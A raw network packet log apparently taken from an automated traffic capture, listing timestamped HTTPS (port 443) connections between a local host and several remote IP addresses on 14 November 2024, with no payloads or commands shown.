                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.891769886 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.892884970 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.893330097 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.893493891 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.893501043 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.893520117 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.893574953 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.893625021 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.893707991 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.893733978 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.893796921 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.893892050 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.893979073 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.894071102 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.894097090 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.894161940 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.894239902 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.894318104 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.894443035 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.901745081 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.901928902 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.901943922 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.903070927 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.903714895 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.903886080 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:41.949426889 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:42.960453033 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:42.960630894 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:42.960695028 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:42.961657047 CET49746443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:42.961678982 CET44349746192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.009556055 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.028044939 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.028107882 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.029090881 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.029512882 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.029548883 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.051338911 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.173300028 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.173361063 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.173382998 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.173460960 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.173460960 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.173475981 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.220128059 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.291987896 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.292000055 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.292021036 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.292084932 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.292084932 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.293009043 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.293018103 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.293097973 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.294411898 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.294420958 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.294548035 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.325006962 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.325016022 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.325227976 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.411540031 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.411550999 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.411643028 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.412621021 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.412710905 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.413290024 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.413403988 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.414177895 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.414231062 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.415047884 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.415131092 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.416549921 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.416642904 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.444156885 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.444360971 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.444442034 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.444619894 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.444659948 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.445332050 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.445605040 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.445605993 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.445626974 CET44349747192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.445687056 CET49747443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.787436008 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.787525892 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.787602901 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.787928104 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.787966013 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.966634035 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.966892004 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.966934919 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.968624115 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.968723059 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.970372915 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.970477104 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.970753908 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:43.970772028 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.014863968 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.214087963 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.265177965 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331043005 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331093073 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331113100 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331163883 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331185102 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331264019 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331264973 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331264973 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331264973 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331341982 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331387043 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.331460953 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.333918095 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.333976030 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.334012032 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.334033012 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.334068060 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.334101915 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.448112011 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.448142052 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.448178053 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.448219061 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.448256016 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.448285103 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.448297977 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.448348045 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.448685884 CET49748443192.168.2.413.35.58.61
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.448702097 CET4434974813.35.58.61192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.503829002 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.503876925 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.503941059 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.504154921 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.504190922 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.504240036 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.504395962 CET49751443192.168.2.4192.229.133.221
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.504412889 CET44349751192.229.133.221192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.504618883 CET49752443192.168.2.413.35.58.91
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.504641056 CET4434975213.35.58.91192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.532227039 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.532264948 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.532319069 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.532855988 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.532879114 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.532934904 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.533113003 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.533119917 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.533176899 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.533293009 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.533328056 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.533373117 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.533838987 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.533921003 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.534018040 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.534040928 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.534059048 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.534185886 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.534199953 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.534326077 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.534338951 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.534447908 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.534465075 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.534585953 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.534626961 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.537296057 CET49758443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.537316084 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.537372112 CET49758443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.537868023 CET49758443192.168.2.4152.199.21.175
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.537889004 CET44349758152.199.21.175192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.586287975 CET49760443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.586316109 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.586375952 CET49760443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.586625099 CET49760443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.586639881 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.626490116 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.626713991 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.626782894 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.628261089 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.628339052 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.628709078 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.628801107 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.628906012 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.628935099 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.669559002 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.800288916 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.800355911 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.800378084 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.800554991 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.800620079 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.847031116 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.897749901 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.897783041 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.897934914 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.897934914 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.917601109 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.917632103 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.917776108 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.917777061 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.918766975 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.918787003 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.918859005 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:44.918859005 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.014950991 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.015156984 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.015211105 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.015285015 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.034146070 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.034331083 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.034943104 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.035124063 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.036081076 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.036252022 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.037018061 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.037097931 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.037626028 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.037688971 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.092641115 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.092880964 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.131088972 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.131283045 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.131457090 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.134494066 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.153126001 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.153126001 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.153193951 CET44349750192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.153304100 CET49750443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.271677971 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.272013903 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.272043943 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.272100925 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.272270918 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.272285938 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.273104906 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.273349047 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.273699045 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.273814917 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.274329901 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.274331093 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.274400949 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.274758101 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.274764061 CET49753443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.274780989 CET4434975313.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.274835110 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.275027037 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.275038004 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.275265932 CET49756443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.275273085 CET4434975613.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.276206970 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.276390076 CET49760443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.276401043 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.276504040 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.276648045 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.276709080 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.277009964 CET49760443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.277081013 CET44349760192.254.232.133192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.277216911 CET49760443192.168.2.4192.254.232.133
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.277287960 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.277429104 CET49755443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.277434111 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.277545929 CET4434975513.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.278673887 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.279015064 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.279040098 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.279910088 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.279988050 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.280335903 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.280335903 CET49754443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.280349016 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.280388117 CET4434975413.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.286959887 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.287262917 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.287326097 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.288877964 CET4434975713.107.246.45192.168.2.4
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.288975954 CET49757443192.168.2.413.107.246.45
                                                                                                                                                                                                                                            Nov 14, 2024 13:01:45.289767027 CET49757443192.168.2.413.107.246.45
